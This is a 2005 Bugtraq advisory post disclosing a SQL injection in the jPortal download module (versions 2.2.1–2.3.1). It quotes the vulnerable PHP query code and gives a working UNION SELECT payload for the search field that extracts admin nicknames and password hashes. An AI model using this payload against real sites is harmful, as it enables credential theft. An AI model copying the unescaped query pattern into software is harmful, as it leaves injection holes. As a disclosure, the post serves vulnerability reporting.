Bugtraq mailing list archives

Sql injection in jPortal version 2.3.1 (module download)

From: krasza () gmail com
Date: 23 Sep 2005 13:05:39 -0000

Versions: all from 2.2.1 to 2.3.1(+Service Pack)+shop jportal(I check this bug only on one site)

SQL injection attack
if magic_quotes_qpc=Off

Problem is in file serching engine (download.php), witch code is in “module/down.inc.php” file:

<code>
if($cat=='all') {
$q_ = "AND title LIKE '%$word%'";
} else {
$q_ = "AND category LIKE '%-$cat-%' AND title LIKE '%$word%'";
}

$query = "SELECT * FROM $file_b_tbl WHERE stat<>5 $q_";
$result = mysql_query($query);
</code>

In $q query we have simple SQL Injection attack (variable $word we take from “search” field) then In field “Where I
should search” ($cat) we SET “everywhere”.  And now we need this query ($query) to attack:

$query = "SELECT * FROM file_data WHERE stat<>5 AND title LIKE '%a%' UNION SELECT NULL , NULL , nick , pass, NULL ,
NULL , NULL , NULL , NULL , NULL , NULL , NULL FROM admins/*%'";
Exploits:
SQL injection attack
-http://www.page.info/download.php
We write in “search” field:
a%' UNION SELECT NULL , NULL , nick , pass, NULL , NULL , NULL , NULL , NULL , NULL , NULL , NULL FROM admins/*

We push “Find” button and we get list of admins and users with coding passwords.

krasza
http://www.krewniacy.pl